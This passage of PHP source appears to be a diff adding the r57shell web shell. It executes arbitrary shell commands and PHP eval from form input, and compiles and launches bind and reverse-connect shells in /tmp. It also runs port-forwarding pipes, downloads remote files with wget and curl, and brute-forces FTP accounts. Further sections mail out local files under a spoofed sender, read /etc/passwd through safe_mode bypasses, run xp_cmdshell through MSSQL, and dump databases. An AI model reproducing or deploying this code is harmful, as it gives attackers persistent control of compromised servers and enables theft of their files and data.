(!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://rst.void.ru\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function up_down($id) + { + global $lang; + global $language; + return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo 